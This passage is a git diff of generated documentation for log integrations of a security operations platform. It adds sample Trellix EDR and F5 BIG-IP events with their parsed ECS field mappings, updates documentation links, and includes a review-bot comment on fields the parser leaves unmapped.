a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md index e5a02a35ac..234b8b327d 100644 --- a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md 
+++ b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "affectedhost_event.json" 
@@ -130,6 +130,50 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "alert_event_1.json" + + ```json + + { + "message": "{\n \"id\": \"00000-00000-0000-000000.0000000000000\",\n \"type\": \"alerts\",\n \"attributes\": {\n \"traceId\": \"00000-000-00000-0000-0000\",\n \"parentTraceId\": \"000-00-000-000000-00\",\n \"rootTraceId\": \"00-11-11-22-33\",\n \"aGuid\": \"17976A50-2B41-11EC-05DE-B831B5451A77\",\n \"detectionDate\": \"2024-07-31T15:46:52.211+00:00\",\n \"eventDate\": \"2024-07-31T15:20:26.271Z\",\n \"eventType\": \"alert\",\n \"severity\": \"s0\",\n \"score\": 5,\n \"detectionTags\": [\n \"@ATA.Collection\",\n \"@ATA.Discovery\",\n \"@ATE.T1074.001\",\n \"@ATE.T1049\",\n \"@MSI.some_other_rule\"\n ],\n \"relatedTraceIds\": [\n \"30a35a99-dcdf-4d9c-8051-461d6dc8b505\"\n ],\n \"ruleId\": \"some_other_rule\",\n \"rank\": 5,\n \"pid\": 1111,\n \"version\": \"undefined\",\n \"parentsTraceId\": [\n \"000-00-000-000000-00\",\n \"00-11-11-22-33\"],\n \"processName\": \"TestingTest+.exe\",\n \"user\": \"testing_user\",\n \"cmdLine\": \"\\\"c:\\\\Program Files (x86)\\\\TestingTest\\\\SSSSSSSSS\\\\TestingTest+.exe\\\" \",\n \"hashId\": \"testHashId\",\n \"h_os\": \"windows\",\n \"domain\": \"testDomain\",\n \"hostName\": \"testHostName\"\n }\n}", + "event": { + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-31T15:20:26.271000Z", + "host": { + "name": "testHostName", + "os": { + "full": "windows" + } + }, + "observer": { + "product": "EDR", + "vendor": "Trellix" + }, + "process": { + "command_line": "\"c:\\Program Files (x86)\\TestingTest\\SSSSSSSSS\\TestingTest+.exe\" ", + "name": "TestingTest+.exe", + "pid": 1111 + }, + "related": { + "user": [ + "testing_user" + ] + }, + "rule": { + "id": "some_other_rule" + }, + "user": { + "name": "testing_user" + } + } + + ``` + + === "detection_event.json" ```json 
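Review bot: Several attributes of the alert_event_1.json sample that matter for triage are not mapped. `detectionTags` carries ATT&CK technique IDs (`@ATE.T1074.001`, `@ATE.T1049`) that could populate `threat.technique.id`; `severity` (`s0`) and `score` (`5`) are dropped, so nothing lands in `event.severity`; `domain` (`testDomain`) is not set as `user.domain`; and `detectionDate` is lost once `@timestamp` is taken from `eventDate`. Also `h_os: "windows"` is mapped to `host.os.full`, which in ECS is the full OS name with version; `host.os.family` or `host.os.platform` fits the value better, and the Windows event samples in this patch already use `os.family` / `os.platform` for the same kind of value.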
diff --git a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md index 39baa317ca..92ffb3a2f5 100644 --- a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md +++ b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md @@ -109,6 +109,54 @@ In this section, you will find examples of raw logs as generated natively by the +=== "alert_event_1" + + + ```json + { + "id": "00000-00000-0000-000000.0000000000000", + "type": "alerts", + "attributes": { + "traceId": "00000-000-00000-0000-0000", + "parentTraceId": "000-00-000-000000-00", + "rootTraceId": "00-11-11-22-33", + "aGuid": "17976A50-2B41-11EC-05DE-B831B5451A77", + "detectionDate": "2024-07-31T15:46:52.211+00:00", + "eventDate": "2024-07-31T15:20:26.271Z", + "eventType": "alert", + "severity": "s0", + "score": 5, + "detectionTags": [ + "@ATA.Collection", + "@ATA.Discovery", + "@ATE.T1074.001", + "@ATE.T1049", + "@MSI.some_other_rule" + ], + "relatedTraceIds": [ + "30a35a99-dcdf-4d9c-8051-461d6dc8b505" + ], + "ruleId": "some_other_rule", + "rank": 5, + "pid": 1111, + "version": "undefined", + "parentsTraceId": [ + "000-00-000-000000-00", + "00-11-11-22-33" + ], + "processName": "TestingTest+.exe", + "user": "testing_user", + "cmdLine": "\"c:\\Program Files (x86)\\TestingTest\\SSSSSSSSS\\TestingTest+.exe\" ", + "hashId": "testHashId", + "h_os": "windows", + "domain": "testDomain", + "hostName": "testHostName" + } + } + ``` + + + === "detection_event" diff --git a/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md b/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md index 9302e28634..17047fb24b 100644 
--- a/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md +++ b/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_aianalyst.json" diff --git a/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md b/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md index a8cc1f7d28..efe4ac322b 100644 --- a/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md +++ b/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_dhcp_lease.json" diff --git a/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md b/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md index 75edea3607..0e2b90c4c5 100644 --- a/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md +++ b/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md 
@@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ioc_view_no_pwd_set.json" diff --git a/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md b/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md index f585cd5cd5..3fc165585b 100644 --- a/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md +++ b/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alerts_1.json" diff --git a/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md b/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md index 96f9c3e186..59567022a7 100644 --- a/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md +++ b/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_auth_failed_login.json" diff --git a/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md b/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md index d897b61e53..0c6957640c 100644 --- a/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md +++ b/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_file_suspect_detail.json" diff --git a/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md b/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md index c0282aa266..d4def80186 100644 --- a/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md +++ b/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_1.json" diff --git a/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md b/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md index 11fc8decd0..c4fc60b8bd 100644 --- a/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md +++ b/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connect.json" diff --git a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md index 2303dabe2f..100b07da0d 100644 --- a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md +++ b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md @@ -20,7 +20,7 @@ In details, the following table denotes the type of events produced by this inte | Name | Values | | ---- | ------ | | Kind | `alert` | -| Category | `authentication`, `network`, `process` | +| Category | `authentication`, `network`, `process`, `session` | | Type | `alert`, `info`, `start` | 
@@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_afm_1.json" 
@@ -413,6 +413,141 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_asm1.json" + + ```json + + { + "message": "CEF:CEF:0|F5|ASM|15.1.10|Successful Request|Successful Request|2|dvchost=DASEM.example.org dvc=1.1.1.1 cs1=/Common/ASM_ReverseProxy cs1Label=policy_name cs2=/Common/ASM_ReverseProxy cs2Label=http_class_name deviceCustomDate1=May 28 2024 01:46:24 deviceCustomDate1Label=policy_apply_date externalId=111111111111111111 act=passed cn1=0 cn1Label=response_code src=1.2.3.4 spt=51702 dst=5.6.7.8 dpt=443 requestMethod=GET app=HTTPS cs5=4.3.2.1 cs5Label=x_forwarded_for_header_value rt=Jul 31 2024 11:23:28 deviceExternalId=0 cs4=N/A cs4Label=attack_type cs6=FR cs6Label=geo_location c6a1= c6a1Label=device_address c6a2= c6a2Label=source_address c6a3= c6a3Label=destination_address c6a4= c6a4Label=ip_address_intelligence msg=N/A suid=0 suser=N/A cn2=0 cn2Label=violation_rating cn3=0 cn3Label=device_id threatCampaignNames=N/A stagedThreatCampaignNames=N/A microservice=N/A Ipv4AddressIntelligence=N/A IpIntelligenceCategory=N/A request=/path/document.json cs3Label=full_request cs3=GET /path/document.json HTTP/1.1\\r\\nHost: text.example.org\\r\\nUser-Agent: synthetic-monitoring-agent/v0.25.1-0-gf2f001c3 (linux amd64; f2f001c3bee25951947fd2cc5ee345fb7aba93b4; 2024-07-30 21:53:28+00:00; +https://github.com/grafana/synthetic-monitoring-agent)\\r\\nReferer: https://5.6.7.8/\\r\\nX-Sm-Id: -41288030-1\\r\\nConnection: close\\r\\nX-Forwarded-For: 4.3.2.1\\r\\n\\r\\n\n", + "event": { + "action": "Successful Request", + "category": [ + "network" + ], + "code": "Successful Request", + "outcome": "success", + "severity": 2, + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-31T11:23:28Z", + "action": { + "name": "passed", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "host": { + "hostname": "DASEM.example.org", + "name": 
"DASEM.example.org" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 0 + } + }, + "network": { + "protocol": "HTTPS" + }, + "observer": { + "hostname": "DASEM.example.org", + "ip": "1.1.1.1", + "product": "ASM", + "type": "firewall", + "vendor": "F5", + "version": "15.1.10" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "hosts": [ + "DASEM.example.org" + ], + "ip": [ + "1.1.1.1", + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "ruleset": "/Common/ASM_ReverseProxy" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 51702, + "user": { + "id": "0" + } + }, + "url": { + "original": "/path/document.json", + "path": "/path/document.json" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "synthetic-monitoring-agent/v0.25.1-0-gf2f001c3 (linux amd64; f2f001c3bee25951947fd2cc5ee345fb7aba93b4; 2024-07-30 21:53:28+00:00; +https://github.com/grafana/synthetic-monitoring-agent)", + "os": { + "name": "Linux" + } + } + } + + ``` + + +=== "test_audit.json" + + ```json + + { + "message": "tmsh[28791]: 01420002:5: AUDIT - pid=28791 user=root folder=/ module=(tmos)# status=[Command OK] cmd_data=cd / ;", + "event": { + "category": [ + "process" + ], + "type": [ + "info" + ] + }, + "action": { + "type": "tmsh" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "process": { + "command_line": "cd / ;", + "pid": 28791, + "working_directory": "/" + }, + "related": { + "user": [ + "root" + ] + }, + "user": { + "name": "root" + } + } + + ``` + + === "test_cron.json" ```json @@ -428,7 +563,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "action": { - "name": "CMD" + "name": "CMD", + "type": "CROND" }, "os": { "family": "linux", 
@@ -450,6 +586,65 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_http_request.json" + + ```json + + { + "message": "CEF:0|F5|BIG-IP|||HTTP Request|Low| src=1.2.3.4 spt=57873 dst=5.6.7.8 dpt=443 requestMethod=POST request=/adfs/services/trust/2005/windowstransport requestClientApplication=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22621", + "event": { + "action": "HTTP Request", + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "http": { + "request": { + "method": "POST" + } + }, + "observer": { + "product": "BIG-IP", + "type": "firewall", + "vendor": "F5" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 57873 + }, + "url": { + "original": "/adfs/services/trust/2005/windowstransport", + "path": "/adfs/services/trust/2005/windowstransport" + } + } + + ``` + + === "test_logger.json" ```json 
@@ -494,6 +689,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_logger2.json" + + ```json + + { + "message": "logger[5533]: [ssl_acc] 1.2.3.4 - admin [15/Jul/2024:02:51:49 +0200] /mgmt/shared/inflate/available 200 2", + "event": { + "category": [ + "network" + ], + "type": [ + "info" + ] + }, + "action": { + "type": "logger" + }, + "http": { + "response": { + "status_code": 200 + } + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "admin" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "original": "/mgmt/shared/inflate/available", + "path": "/mgmt/shared/inflate/available" + }, + "user": { + "name": "admin" + } + } + + ``` + + +=== "test_logger3.json" + + ```json + + { + "message": "logger[20088]: [ssl_req][31/Jul/2024:16:36:53 +0200] 10.129.224.157 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"/my.policy\" 199", + "event": { + "category": [ + "network" + ], + "type": [ + "info" + ] + }, + "action": { + "type": "logger" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "10.129.224.157" + ] + }, + "source": { + "address": "10.129.224.157", + "ip": "10.129.224.157" + }, + "tls": { + "version": "1.2", + "version_protocol": "tlsv" + }, + "url": { + "original": "/my.policy", + "path": "/my.policy" + } + } + + ``` + + === "test_psm_1.json" ```json 
@@ -1062,6 +1350,43 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_sshd.json" + + ```json + + { + "message": "sshd[14116]: Connection closed by 10.80.0.111 port 42248 [preauth]", + "event": { + "category": [ + "session" + ], + "reason": "Connection closed", + "type": [ + "end" + ] + }, + "action": { + "type": "sshd" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "10.80.0.111" + ] + }, + "source": { + "address": "10.80.0.111", + "ip": "10.80.0.111", + "port": 42248 + } + } + + ``` + + === "test_ssl.json" ```json @@ -1353,6 +1678,8 @@ The following table lists the fields that are extracted, normalized under the EC |`observer.vendor` | `keyword` | Vendor name of the observer. | |`observer.version` | `keyword` | Observer version. | |`process.command_line` | `wildcard` | Full command line that started the process. | +|`process.pid` | `long` | Process id. | +|`process.working_directory` | `keyword` | The working directory of the process. | |`rule.name` | `keyword` | Rule name | |`rule.ruleset` | `keyword` | Rule ruleset | |`source.address` | `keyword` | Source network address. | diff --git a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md index 9666d9354f..dc4d1db2e8 100644 --- a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md +++ b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md 
@@ -60,6 +60,23 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_asm1" + + ``` + CEF:CEF:0|F5|ASM|15.1.10|Successful Request|Successful Request|2|dvchost=DASEM.example.org dvc=1.1.1.1 cs1=/Common/ASM_ReverseProxy cs1Label=policy_name cs2=/Common/ASM_ReverseProxy cs2Label=http_class_name deviceCustomDate1=May 28 2024 01:46:24 deviceCustomDate1Label=policy_apply_date externalId=111111111111111111 act=passed cn1=0 cn1Label=response_code src=1.2.3.4 spt=51702 dst=5.6.7.8 dpt=443 requestMethod=GET app=HTTPS cs5=4.3.2.1 cs5Label=x_forwarded_for_header_value rt=Jul 31 2024 11:23:28 deviceExternalId=0 cs4=N/A cs4Label=attack_type cs6=FR cs6Label=geo_location c6a1= c6a1Label=device_address c6a2= c6a2Label=source_address c6a3= c6a3Label=destination_address c6a4= c6a4Label=ip_address_intelligence msg=N/A suid=0 suser=N/A cn2=0 cn2Label=violation_rating cn3=0 cn3Label=device_id threatCampaignNames=N/A stagedThreatCampaignNames=N/A microservice=N/A Ipv4AddressIntelligence=N/A IpIntelligenceCategory=N/A request=/path/document.json cs3Label=full_request cs3=GET /path/document.json HTTP/1.1\r\nHost: text.example.org\r\nUser-Agent: synthetic-monitoring-agent/v0.25.1-0-gf2f001c3 (linux amd64; f2f001c3bee25951947fd2cc5ee345fb7aba93b4; 2024-07-30 21:53:28+00:00; +https://github.com/grafana/synthetic-monitoring-agent)\r\nReferer: https://5.6.7.8/\r\nX-Sm-Id: -41288030-1\r\nConnection: close\r\nX-Forwarded-For: 4.3.2.1\r\n\r\n + + ``` + + + +=== "test_audit" + + ``` + tmsh[28791]: 01420002:5: AUDIT - pid=28791 user=root folder=/ module=(tmos)# status=[Command OK] cmd_data=cd / ; + ``` + + + === "test_cron" ``` 
@@ -68,6 +85,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_http_request" + + ``` + CEF:0|F5|BIG-IP|||HTTP Request|Low| src=1.2.3.4 spt=57873 dst=5.6.7.8 dpt=443 requestMethod=POST request=/adfs/services/trust/2005/windowstransport requestClientApplication=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22621 + ``` + + + === "test_logger" ``` @@ -76,6 +101,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_logger2" + + ``` + logger[5533]: [ssl_acc] 1.2.3.4 - admin [15/Jul/2024:02:51:49 +0200] /mgmt/shared/inflate/available 200 2 + ``` + + + +=== "test_logger3" + + ``` + logger[20088]: [ssl_req][31/Jul/2024:16:36:53 +0200] 10.129.224.157 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "/my.policy" 199 + ``` + + + === "test_psm_1" ``` @@ -162,6 +203,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_sshd" + + ``` + sshd[14116]: Connection closed by 10.80.0.111 port 42248 [preauth] + ``` + + + === "test_ssl" ``` diff --git a/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md b/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md index 228c7307c1..a082513b87 100644 --- a/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md +++ b/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "query_log.json" diff --git a/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md b/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md index a699d8dce9..07c8f5b593 100644 --- a/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md +++ b/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md 
